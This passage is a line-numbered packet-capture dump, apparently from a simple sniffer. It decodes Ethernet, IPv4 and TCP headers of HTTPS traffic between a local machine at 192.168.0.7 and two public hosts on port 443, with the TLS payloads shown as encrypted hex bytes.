\xf6\x11\x30\x11\x8f\x06\xdd\xfc\xae\xa1\x0e\x23\xaa\xb5\x07\x8f\x7b\x37\x87 159 | \x2b\xc3\x77\x99\x60\x02\xd3\x8e\xec\x14\xd2\x3d\x45\xc7\x4d\x67\x62\x6c\x7f 160 | \xf9\xcb\x04\xc7\x75\x02\x68\xae\xbf\xda\x03\xe8\x55\x9f\xc3\x62\x39\x60\x1d 161 | \x29\x31\xb9\xab\xb3\x60\x6e\x87\x63\xf8\x7e\x78\x93\xa6\x74\x9f\xb8\x74\x2c 162 | \x09\x1e\x0c\xfa\x6c\xee\x5b\x45\x5d\x56\x84\x6a\x63\xe6\x8d\xd7\x5c\x49\xa6 163 | \xce\xcf\xb4\xcd\x95\x0b\x55\x41\x0f\x47\x5b\x8d\x7d\x7b\x99\x16\x66\xaf\xa4 164 | \x13\x1d\xda\x8a\x96\xbe\x10\xfa\x7e\x63\xb9\x7b\xd4\x5a\xe1\xb1\xf2\x12\xc5 165 | \x76\x0c\x19\xfe\x8b\x20\xed\x82\x49\x09\x01\xbd\xba\xc4\xf6\x7e\x5e\x66\x8d 166 | \x19\xca\x5e\x6a\x38\xbc\xfc\x0c\xa2\x7d\xf8\x11\x49\x6f\x2e\x78\x49\xc1\x6c 167 | \x57\x6d\x61\x19\x5e\x5c\xc8\xa9\xd9\x59\x55\x30\xd2\xfb\x71\xdb\x37\x34\x23 168 | \xee\x45\x62\x4a\x4f\x81\x7c\x30\x72\xab\x11\x67\xda\x6e\x2a\x32\x4b\x8a\x64 169 | \xeb\x98\xf8\x78\x47\x6e\x18\x0a\xf1\x7c\x70\x26\xb1\x88\x81\xfd\xf7\x04\xdd 170 | \x93\xf0\xae\x09\x0d\x61\xa4\xdf\x83\x05\x1a\xca\x48\x7d\xff\x5c\x73\xca\xb5 171 | \xa7\xbc\xd3\xca 172 | 173 | Ethernet Frame: 174 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 175 | - IPv4 Packet: 176 | - Version: 4, Header Length: 20, TTL: 64, 177 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.27.206 178 | - TCP Packet: 179 | - Source Port: 49888, Destination Port: 443 180 | - Sequence: 3703331061, Acknowledgement: 2995710318 181 | - Flags: 182 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 183 | - Data: 184 | \x17\x03\x03\x00\x8e\x00\x00\x00\x00\x00\x00\x00\x11\x40\x74\x45\xd5\x84\x7b 185 | \x5a\xdc\x5d\xc5\xf8\x50\x2e\xa9\x38\x78\x7b\x51\xf4\x51\x0a\x77\x55\x74\x06 186 | \xf1\x6e\x06\x6d\xf6\xbd\x35\x3f\x4e\x3b\x7d\x66\xfb\x16\xb1\xfc\xa6\x5e\x0c 187 | \xb2\xac\x57\x97\x94\x7e\x76\xbe\xb5\x03\x5f\x3e\x53\x56\xc8\x71\xd8\xdf\x20 188 | \x25\xc8\xd9\xc1\x57\xd7\x44\xb3\xc4\x20\x28\x05\xd9\x77\x41\x40\x6b\xa8\xad 189 | \x18\xe2\x2f\xd4\x79\x83\x84\x48\xa7\xb4\x16\x93\x9e\x7e\x03\x89\x63\xd2\x67 190 | \x21\x93\xbb\xd5\xae\x11\xb0\xe2\xc8\xc1\xad\xfb\x7a\x20\xd6\x2b\xb5\xb0\x80 191 | \x83\x09\x61\xa7\xc3\xb1\x4e\xfd\xe1\x5f\x80\xaf\xa1\x52\x17\x03\x03\x04\xe4 192 | \x00\x00\x00\x00\x00\x00\x00\x12\x69\xae\xdc\x68\xe3\x0a\x8e\x73\x94\x6f\xf0 193 | \x9f\x41\x00\xf3\x51\x38\xaa\x27\xd6\x5c\xb2\x3b\x0f\x9e\x88\x84\xcd\x7c\x7c 194 | \x4e\xc3\x00\x11\xf6\x15\xca\xa2\xb7\xa0\x75\xc3\x9f\x80\xe9\xfa\x25\x96\xc2 195 | \xa6\x11\x7c\xc8\x68\x07\x09\xb7\xf7\x88\x72\xb6\x9c\x9b\x1f\xd4\x94\xcb\xed 196 | \x0e\x2a\x96\xa3\x88\x1e\x8f\x78\x5c\x1b\x09\x34\x33\xdd\x32\x97\x76\x5a\xae 197 | \x6f\x5e\xae\x89\xbd\x6f\x76\xf4\x9b\xc9\x87\x00\xb5\x9e\xa9\xda\x8a\x0c\xb4 198 | \xb9\x14\x3a\xee\x81\x2a\x15\xc1\x0a\x10\x88\x2e\xcd\xb5\x21\x41\x53\xb5\x63 199 | \xb1\x8b\xa6\x97\x61\x09\x0f\x7f\xee\x02\x6a\xee\x38\x73\x24\xa2\x27\x39\x0f 200 | \xb1\x84\xe1\x62\x84\xd5\x39\xb6\x49\x61\xa9\x8e\x71\x45\x17\x55\xc6\xaf\xc2 201 | \x33\xf0\x92\xdf\x4e\xcb\x13\x1e\xa3\x4e\x0d\x48\xab\xd6\x4f\xc9\xb0\xb7\x12 202 | \xcb\xb5\x9b\xb7\xa5\xbd\xa0\x72\xaa\x5e\x3d\x18\x22\x16\xf4\xdc\xa4\x7d\x9c 203 | \xc0\x0f\x06\x02\x02\x49\x9a\xa5\xc1\xf4\x93\x8d\x14\x88\x01\x0a\xb6\x1c\x3c 204 | \xf1\xbd\xfe\x97\x81\xb9\x4f\x0b\xae\x07\x84\x38\xdb\x9c\x57\x80\x34\x98\xc6 205 | \xaf\x8d\xe7\xd4\x18\xcc\x50\x26\x4a\xb7\x19\xdd\xc7\xfd\x8f\xfc\xc7\x67\x76 206 | \x32\x04\x38\x39\x86\x27\xa2\x86\x01\x99\xb7\x12\xc5\x70\x0c\x13\x1f\xd9\x48 207 | \xbc\x2d\x8d\xff\x17\x78\x84\x09\x47\x41\x9e\x86\xf9\x19\xe4\x64\xcb\x55\x35 208 | \x5b\x23\x7a\x8d\xd2\x27\x76\x78\x8d\x92\xc4\x38\x25\x0c\x58\x48\x8a\xfa\x01 209 | \x84\x80\x5a\x24\xa3\xbd\xb8\xe7\xc9\x90\x1c\x68\xaf\xf9\x50\x93\x5b\x1f\xae 210 | \x14\x73\xf4\x9f\xd6\x31\x95\x89\xed\xa7\x74\x20\x88\x1d\xb2\xcd\x18\x62\xcb 211 | \x2e\x5f\x27\x6f\x68\x23\x5e\xac\x52\xda\x7c\x23\xab\x06\xa9\x29\xfb\x1b\x7b 212 | \x35\x9d\x87\x9f\x7b\x98\xb2\x9b\x65\xc4\xff\xb8\x99\x09\xc8\x13\xb7\x2d\xd3 213 | \x8f\x24\x9e\x5b\x54\x20\xd3\x3a\xbe\xde\x8b\x10\xa2\xa6\xee\xbc\xb9\x97\xbd 214 | \xda\x3a\xce\x27\xef\xf2\x81\x2d\x49\xd0\xde\xa2\x85\xb3\x3b\x80\xa7\xfe\xa8 215 | \xa1\x39\x83\xb6\xd0\xff\x38\xc4\xb0\xbc\xdb\x1f\x66\x84\x6a\x2f\xd7\x13\x70 216 | \x05\x70\x5d\x61\xea\x86\xd6\x1f\x7d\x5f\x71\x9b\x20\xd2\xef\xcd\x5f\x01\x02 217 | \xc4\x2d\x08\x8c\xcd\xe7\xb7\x08\x39\xc2\x00\x63\xda\x09\xc5\x0a\x8b\x23\xa7 218 | \x6a\xa3\x16\xf9\x77\xff\x7d\xc3\x79\x29\x4b\xdc\x3e\x2a\xec\x73\x59\xd5\xdb 219 | \xdc\xa7\x50\x73\x8c\xae\x13\x53\xa3\x59\xf3\xa3\x4f\xe6\x04\x7b\xce\x3a\x59 220 | \xa2\xac\x39\x29\xcd\xb6\x31\x58\x7f\xa1\xa0\x1a\x70\x93\x4e\xb8\xd2\xc0\x6d 221 | \x12\x6c\xf3\x66\x13\x24\xd5\x23\x8b\xd9\x12\xcb\xde\xec\xea\x61\x0c\xd8\x64 222 | \xe6\xc9\xaa\xd5\x67\x1d\xcb\x41\x53\x02\x31\xb2\x5f\x2f\xd1\xab\xa9\x98\x35 223 | \x72\x68\x76\x19\xb1\x0b\x6a\xd8\xfb\x67\xf1\x06\x2a\x4f\x1f\x98\x91\x9d\x67 224 | \x10\x08\x26\x29\xc7\x16\x5c\x6a\xb6\x6f\xbc\x62\x28\x26\xf0\x9d\x17\x05\x83 225 | \xdb\x2d\x15\x72\xe9\x1e\x36\x90\xe3\x6e\xed\x10\x9e\x23\xd6\x83\x7c\xd9\x5f 226 | \x70\x81\xe1\x69\xf9\x97\x42\x44\x7d\x79\x82\xdb\x9d\x32\xc7\x8e\x8e\x90\xed 227 | \xb5\x41\xec\x82\xd6\xba\xf4\x70\x07\x21\x65\x04\x63\x81\x5d\x9a\x27\x2d\x5a 228 | \xd9\x53\x91\x92\x64\xb1\x9b\xbc\x2d\xd2\x4d\x43\x56\x32\xe1\x7c\x96\x34\x9f 229 | \xb9\x2e\xe9\x98\x9e\xc3\x17\x71\xf4\x25\xcf\x96\xbc\x85\x17\x32\xae\xa1\xc4 230 | \x4d\xfe\x35\x83\x4e\x53\x4d\x0e\x93\xca\x86\x43\xd8\xa5\xfd\x67\x82\x18\x6e 231 | \x85\x59\x50\xcb\x8d\x63\xb0\x5f\xf6\xe8\x17\x6c\x91\x5d\x9d\x95\x3e\x5d\x8f 232 | \x8a\x4a\x3f\x42\x3a\xba\xd8\x2a\x5a\x52\x29\x18\x8e\xc8\x59\x26\xec\x1d\x41 233 | \x75\x99\x7c\x6b\x50\x07\xdd\x9f\x08\x02\xad\x14\xb3\xa0\xe9\x86\xd1\x01\xd3 234 | \x44\x03\xa4\x81\x0c\x76\x58\xc7\x13\x52\x9a\x13\x07\xad\xbe\x51\x24\x7c\x84 235 | \xe2\x96\x83\x43\x47\xa5\xf8\xa2\x7d\x84\x57\x10\x0b\xbd\xc9\x8f\x77\x37\x54 236 | \x0a\x4d\xed\xe1\x3f\xc5\x2e\xc2\x62\xed\x7c\x32\x47\xc9\xd9\xc2\xec\xaa\x57 237 | \x5d\x7c\x0a\x2f\x45\x62\x7f\x63\x7d\xd5\x9d\x8c\xf4\xc0\x6d\x5e\x8c\xb0\x53 238 | \x9d\x00\x2c\xa9\x0b\xeb\x2a\x0f\xeb\x86\xcc\x0d\x9b\x6a\xae\xab\x7c\x1c\x64 239 | \x98\xb8\x2f\xf3\x5c\xd7\xa0\x01\xb8\xae\xfe\x5a\x2f\x92\x65\x0d\x2c\x86\x68 240 | \x54\xeb\x0d\x08\x8c\x81\x5f\xca\x6c\xa6\x4b\x9d\xad\xef\xbd\xdd\x56\xb3\x41 241 | \x61\x19\xcb\xa0\xda\x40\x73\x4d\xbe\xae\xa9\x44\x8c\xdb\xbb\xbc\xcf\xac\xe5 242 | \xe7\x92\x8b\xc0\xc4\x06\x16\x3e\x0f\x75\x0d\x02\xd2\xc8\x33\x03\x38\xf1\x54 243 | \x50\xd8\xa4\x63\xcd\xcb\xc4\xcd\x17\x86\xb5\x05\xb6\x6a\x57\x0b\xe4\xa2\xf0 244 | \x50\xea\xeb\x13\x8d\xa4\xca\xde\x11\x58\xca\x0f\x68\x69\x3d\xd9\x07\x4c\x51 245 | \x90\x6c\x0c\xd2\x62\xf8\xbc\x93\x4d\x82\x40\xa2\xc7\x02\xed\x4f\xc2\x7b\xda 246 | \xe4\x59\xd6\x02\xe8\x07\x84\xc9\x9e\xd5\x5c\xd1\x4e\xb7\xfd\x01\xea\xa6\xd9 247 | \x14\xc0\xb6\x10\xc3\x8d\xf7\x1b\xd5\x7f\xae\x3b\x7a\xbe\x46\xbd\xd5\x76\x19 248 | \x47\x02\xda\x49\xd0\x1b\x13\x51\x2a\x63\x25\x3c\x25\xf5\x4b\x67\x86\xe6\xdb 249 | \x1c\xbe\x68\x50\x69\xb6\x27\x8b\x51\xd1\x47\xb4\x04\x06\x70\x2a\x55\x8b\x1e 250 | \xd0\x38\x0b\x13\x6b\x77\xd6\x32\x54\x62\x88\x00\x6d\xba\xe1\x61\xaf\xcc\x0d 251 | \x72\x44\x7a\x30\x02\x29\x37\x8b\xb5\xf9\xa8\x4e\xf2\x05\xf2\x7e\x59\x1b\x3c 252 | \x68\x01\x76\x6f\x0c\x59\x0e\x1f\x25\x3c\x68\x6e\x8b\xc1\xed\x8a\xb9\x8c\xa1 253 | \xc9\x94\xea\xe7\x6f\x97\xe8\x71\x56\x63\x39\x87\x7f\x91\x5c\x17\xa8\x96\x3a 254 | \xab\x5a\x5d\x7e\xb0\xf6\x48\x9b\x58\x92\x15\x84\xd1\x19\x3f\xb9\x90\xdc\x31 255 | \xbc\x4e\x06\xeb\x8b\x8f\x79\x6c\xce\x22\x59\x04\xd8\xcb\xbc\x90\x88\xb3\x5d 256 | 257 | Ethernet Frame: 258 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 259 | - IPv4 Packet: 260 | - Version: 4, Header Length: 20, TTL: 59, 261 | - Protocol: 6, Source: 172.217.24.238, Target: 192.168.0.7 262 | - TCP Packet: 263 | - Source Port: 443, Destination Port: 43360 264 | - Sequence: 455481000, Acknowledgement: 3702875526 265 | - Flags: 266 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 267 | - Data: 268 | 269 | 270 | Ethernet Frame: 271 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 272 | - IPv4 Packet: 273 | - Version: 4, Header Length: 20, TTL: 64, 274 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.238 275 | - TCP Packet: 276 | - Source Port: 43360, Destination Port: 443 277 | - Sequence: 3702875526, Acknowledgement: 455481000 278 | - Flags: 279 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 280 | - Data: 281 | 282 | 283 | Ethernet Frame: 284 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 285 | - IPv4 Packet: 286 | - Version: 4, Header Length: 20, TTL: 56, 287 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 288 | - TCP Packet: 289 | - Source Port: 443, Destination Port: 49888 290 | - Sequence: 2995710318, Acknowledgement: 3703322902 291 | - Flags: 292 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 293 | - Data: 294 | 295 | 296 | Ethernet Frame: 297 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 298 | - IPv4 Packet: 299 | - Version: 4, Header Length: 20, TTL: 64, 300 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.27.206 301 | - TCP Packet: 302 | - Source Port: 49888, Destination Port: 443 303 | - Sequence: 3703332429, Acknowledgement: 2995710318 304 | - Flags: 305 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 306 | - Data: 307 | \xd2\x0e\xc7\x74\xa7\xd1\xdb\x6b\x41\x95\x9d\xa7\x61\xb7\x63\xf6\xdc\x0e\xef 308 | \xe8\x38\xef\x3a\x7f\xdc\x7d\xb3\xd5\x62\xc9\xd3\xb8\x9b\xc5\x23\xb4 309 | 310 | Ethernet Frame: 311 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 312 | - IPv4 Packet: 313 | - Version: 4, Header Length: 20, TTL: 56, 314 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 315 | - TCP Packet: 316 | - Source Port: 443, Destination Port: 49888 317 | - Sequence: 2995710318, Acknowledgement: 3703324270 318 | - Flags: 319 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 320 | - Data: 321 | 322 | 323 | Ethernet Frame: 324 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 325 | - IPv4 Packet: 326 | - Version: 4, Header Length: 20, TTL: 56, 327 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 328 | - TCP Packet: 329 | - Source Port: 443, Destination Port: 49888 330 | - Sequence: 2995710318, Acknowledgement: 3703325792 331 | - Flags: 332 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 333 | - Data: 334 | 335 | 336 | Ethernet Frame: 337 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 338 | - IPv4 Packet: 339 | - Version: 4, Header Length: 20, TTL: 56, 340 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 341 | - TCP Packet: 342 | - Source Port: 443, Destination Port: 49888 343 | - Sequence: 2995710318, Acknowledgement: 3703327160 344 | - Flags: 345 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 346 | - Data: 347 | 348 | 349 | Ethernet Frame: 350 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 351 | - IPv4 Packet: 352 | - Version: 4, Header Length: 20, TTL: 56, 353 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 354 | - TCP Packet: 355 | - Source Port: 443, Destination Port: 49888 356 | - Sequence: 2995710318, Acknowledgement: 3703328528 357 | - Flags: 358 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 359 | - Data: 360 | 361 | 362 | Ethernet Frame: 363 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 364 | - IPv4 Packet: 365 | - Version: 4, Header Length: 20, TTL: 56, 366 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 367 | - TCP Packet: 368 | - Source Port: 443, Destination Port: 49888 369 | - Sequence: 2995710318, Acknowledgement: 3703328682 370 | - Flags: 371 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 372 | - Data: 373 | 374 | 375 | Ethernet Frame: 376 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 377 | - IPv4 Packet: 378 | - Version: 4, Header Length: 20, TTL: 56, 379 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 380 | - TCP Packet: 381 | - Source Port: 443, Destination Port: 49888 382 | - Sequence: 2995710318, Acknowledgement: 3703331061 383 | - Flags: 384 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 385 | - Data: 386 | 387 | 388 | Ethernet Frame: 389 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 390 | - IPv4 Packet: 391 | - Version: 4, Header Length: 20, TTL: 56, 392 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 393 | - TCP Packet: 394 | - Source Port: 443, Destination Port: 49888 395 | - Sequence: 2995710318, Acknowledgement: 3703332429 396 | - Flags: 397 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 398 | - Data: 399 | 400 | 401 | Ethernet Frame: 402 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 403 | - IPv4 Packet: 404 | - Version: 4, Header Length: 20, TTL: 56, 405 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 406 | - TCP Packet: 407 | - Source Port: 443, Destination Port: 49888 408 | - Sequence: 2995710318, Acknowledgement: 3703332465 409 | - Flags: 410 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 411 | - Data: 412 | 413 | 414 | Ethernet Frame: 415 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 416 | - IPv4 Packet: 417 | - Version: 4, Header Length: 20, TTL: 56, 418 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 419 | - TCP Packet: 420 | - Source Port: 443, Destination Port: 49888 421 | - Sequence: 2995710318, Acknowledgement: 3703332465 422 | - Flags: 423 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 424 | - Data: 425 | \x17\x03\x03\x00\x6b\x00\x00\x00\x00\x00\x00\x00\x3a\xf1\xbd\xb4\x4a\x34\x25 426 | \x75\xb5\x7d\x21\x3b\x00\x3e\xe2\xc0\xe9\xce\xa6\x2c\x19\x6b\xe2\x48\x94\x39 427 | \x86\xd8\x78\x5c\x32\x3a\x5c\x1b\x0d\x66\xea\x53\xda\xc6\x06\x0b\xf6\xf4\xb3 428 | \x6b\xbc\x00\x3e\xc0\x4a\xbd\x83\xce\x76\x9e\x61\x8b\x61\xe2\x40\x41\x24\x53 429 | \x71\x81\x7c\xa2\xce\xe0\x88\x7e\xbf\xd6\xd5\xc6\x9a\x83\xb7\x8c\x55\xd4\xfe 430 | \x97\x7c\x9d\xf4\x02\x5a\x3a\x3c\x6e\x63\x36\xa2\x81\x83\x14\xae\x0d 431 | 432 | Ethernet Frame: 433 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 434 | - IPv4 Packet: 435 | - Version: 4, Header Length: 20, TTL: 56, 436 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 437 | - TCP Packet: 438 | - Source Port: 443, Destination Port: 49888 439 | - Sequence: 2995710430, Acknowledgement: 3703332465 440 | - Flags: 441 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 442 | - Data: 443 | \x17\x03\x03\x00\xda\x00\x00\x00\x00\x00\x00\x00\x3b\xb2\x25\xb3\xd2\xc6\xda 444 | \x18\x19\x20\xc9\x89\x25\x96\x70\xb2\x0c\x15\x04\xde\xa6\xb9\x32\x16\xed\xcf 445 | \xad\x9f\x16\xab\x78\x9b\xda\x0d\xbe\x42\x39\x5f\xd2\x2f\x19\x3c\xb1\xb5\xa5 446 | \xe1\x43\x49\x0c\x01\xef\xb5\xf5\x5d\x32\xc1\x37\xe0\xd6\x0f\x29\x18\x22\x11 447 | \xe7\x54\x66\xa2\xe5\xa5\x0e\x9d\x9a\x2c\xb5\x10\x9c\x5c\x69\x9b\xa1\x54\xca 448 | \x7b\x87\x2e\x7c\xf9\x34\x01\xe3\xa6\x01\x9e\x78\xb2\x20\x06\x53\x65\x09\x3a 449 | \x1d\xf2\x06\x48\x56\x96\x3e\xfa\xfe\x03\x26\xf6\xd7\xfd\x60\x3e\xf5\x2c\x0c 450 | \x3b\x36\xcc\x45\xfd\x46\x23\x2a\xd6\x23\xd8\x56\xc3\x98\x3a\x36\x45\x56\xe0 451 | \x0b\x51\x75\x72\x0f\x54\x08\xcf\xfb\x5d\xa7\x03\x84\xbd\xa4\x43\x88\x24\xd0 452 | \xd2\x8e\xe1\xfb\x83\x9b\x77\x89\xa9\x45\x80\x0e\x49\xb3\x84\xe2\xe8\x0d\x37 453 | \x19\xd4\x8c\x9f\x99\x2a\xcf\x33\x9c\x39\xac\xbe\x03\x46\x81\x4c\x43\x40\x69 454 | \x0e\x70\xb9\xdf\xc4\x59\xeb\xf3\xc0\x86\x4b\xca\xa8\x15\x17\x03\x03\x00\xe3 455 | \x00\x00\x00\x00\x00\x00\x00\x3c\x1c\x75\x82\xd9\xf6\x97\xe2\x11\x2d\xfa\xd5 456 | \x2b\x65\x3d\xd9\x52\x9a\x3e\x84\x22\xd9\xa7\x26\x34\xff\xb3\xd6\xd2\x8c\xce 457 | \x54\x76\xc8\xcf\xfb\xc2\x77\xc5\xe3\x28\xdf\xbd\x12\xec\x7d\xf9\x7d\xf0\x3b 458 | \x07\x41\x87\xa0\x7a\x86\xa8\xee\xa8\xef\x1a\x89\x31\xbe\xb6\x55\x50\x65\x27 459 | \x76\x63\x51\x2c\xb3\xbc\x39\x5f\x80\x92\xe1\xc1\x0e\x7f\x76\x70\xec\xba\x8d 460 | \xe6\x6f\x81\xc4\x65\x8b\xd4\xde\x64\xf0\x5d\x2c\x24\xb3\xfd\x48\x9f\xeb\xd1 461 | \x23\x88\x16\x86\xe8\xbd\xaf\x1f\xa4\x57\xdb\xfe\xdf\x8a\xb0\x0d\x99\x8d\x98 462 | \x87\xda\x83\xb7\x93\xc6\xa1\x0d\x00\x35\x1f\xf0\x32\x17\x81\x5f\x82\x6f\x4a 463 | \x00\x05\x78\xc0\x88\x19\xf8\x6e\xed\xc6\x57\x6d\xc3\x67\x66\x43\xcd\xed\x12 464 | \x35\x14\x9e\x63\xf0\xa9\x9f\x08\x1c\x00\xbe\xdd\x1b\xb0\x01\xca\xbe\x01\x49 465 | \x98\x73\x3d\xb7\x62\x42\x5c\x54\xe8\x85\x7c\x4e\x50\x6c\xa9\xb8\x12\xdd\x02 466 | \x1f\xfd\xaa\xe4\x67\x18\x5d\xab\x79\x56\x09\x20\x57\x4e\x10\x24\x6b\xd6 467 | 468 | Ethernet Frame: 469 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 470 | - IPv4 Packet: 471 | - Version: 4, Header Length: 20, TTL: 56, 472 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 473 | - TCP Packet: 474 | - Source Port: 443, Destination Port: 49888 475 | - Sequence: 2995710885, Acknowledgement: 3703332465 476 | - Flags: 477 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 478 | - Data: 479 | \x17\x03\x03\x00\x29\x00\x00\x00\x00\x00\x00\x00\x3d\x8f\xe8\xdd\x9b\x1d\xbf 480 | \x10\x4f\xc8\x76\x99\xd8\x1c\x34\x16\x4b\x59\x4f\x1c\xf1\x31\xd8\x77\xd5\xcc 481 | \x86\x1b\x28\x66\x56\x13\xa6\xae 482 | 483 | Ethernet Frame: 484 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 485 | - IPv4 Packet: 486 | - Version: 4, Header Length: 20, TTL: 64, 487 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.27.206 488 | - TCP Packet: 489 | - Source Port: 49888, Destination Port: 443 490 | - Sequence: 3703332465, Acknowledgement: 2995710931 491 | - Flags: 492 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 493 | - Data: 494 | 495 | 496 | Ethernet Frame: 497 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 498 | - IPv4 Packet: 499 | - Version: 4, Header Length: 20, TTL: 64, 500 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.27.206 501 | - TCP Packet: 502 | - Source Port: 49888, Destination Port: 443 503 | - Sequence: 3703332465, Acknowledgement: 2995710931 504 | - Flags: 505 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 506 | - Data: 507 | \x17\x03\x03\x00\x29\x00\x00\x00\x00\x00\x00\x00\x13\xd1\x8c\x42\x32\x38\xae 508 | \x2e\x6b\x89\xaf\x6f\x9b\x13\x9a\x02\xfb\xc4\x7a\xa9\xe6\xbd\x91\x55\xdc\x65 509 | \x74\x2b\x86\xaa\x0d\x0e\x79\x63 510 | 511 | Ethernet Frame: 512 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 513 | - IPv4 Packet: 514 | - Version: 4, Header Length: 20, TTL: 59, 515 | - Protocol: 6, Source: 172.217.24.238, Target: 192.168.0.7 516 | - TCP Packet: 517 | - Source Port: 443, Destination Port: 43360 518 | - Sequence: 455481000, Acknowledgement: 3702875526 519 | - Flags: 520 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 521 | - Data: 522 | \x17\x03\x03\x00\x52\x00\x00\x00\x00\x00\x00\x00\x2d\x33\x16\xea\x80\x63\x3f 523 | \xf9\xc6\xfa\xde\x3c\x51\x27\x4b\x7b\x75\x82\xb7\xec\x0a\x60\xca\x77\x6f\x73 524 | \x5d\xba\x17\xa5\x0a\xff\xe5\x4f\x3f\xe4\x08\x89\xb0\x58\xca\xe6\x6b\xc4\x65 525 | \x53\x28\x1e\xc9\x83\x25\xb5\x9d\x57\xd7\xc5\x51\x49\xfb\x81\xa4\xd6\xe8\xe1 526 | \xf5\x01\xcd\x33\x18\x31\xb6\x89\x09\xe8\x31 527 | 528 | Ethernet Frame: 529 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 530 | - IPv4 Packet: 531 | - Version: 4, Header Length: 20, TTL: 64, 532 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.238 533 | - TCP Packet: 534 | - Source Port: 43360, Destination Port: 443 535 | - Sequence: 3702875526, Acknowledgement: 455481087 536 | - Flags: 537 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 538 | - Data: 539 | 540 | 541 | Ethernet Frame: 542 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 543 | - IPv4 Packet: 544 | - Version: 4, Header Length: 20, TTL: 59, 545 | - Protocol: 6, Source: 172.217.24.238, Target: 192.168.0.7 546 | - TCP Packet: 547 | - Source Port: 443, Destination Port: 43360 548 | - Sequence: 455481087, Acknowledgement: 3702875526 549 | - Flags: 550 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 551 | - Data: 552 | \x17\x03\x03\x02\xf7\x00\x00\x00\x00\x00\x00\x00\x2e\xaa\xd1\x99\xa6\xd7\x1e 553 | \xaf\x30\x62\x03\xaf\xd0\x04\xa2\xbb\x7a\x22\xc1\x11\x22\x93\x6b\x76\xb4\x74 554 | \x1d\x48\x33\x6b\xb4\x7c\x46\x8a\x48\x4c\x4b\x3f\x6b\x91\xae\xd6\x8b\xdc\xfc 555 | \xdb\xc2\xa7\xae\x0c\x93\xd4\x10\x4a\x94\x0e\xd2\xf6\x4e\x4b\xfc\x3d\x8f\xe4 556 | 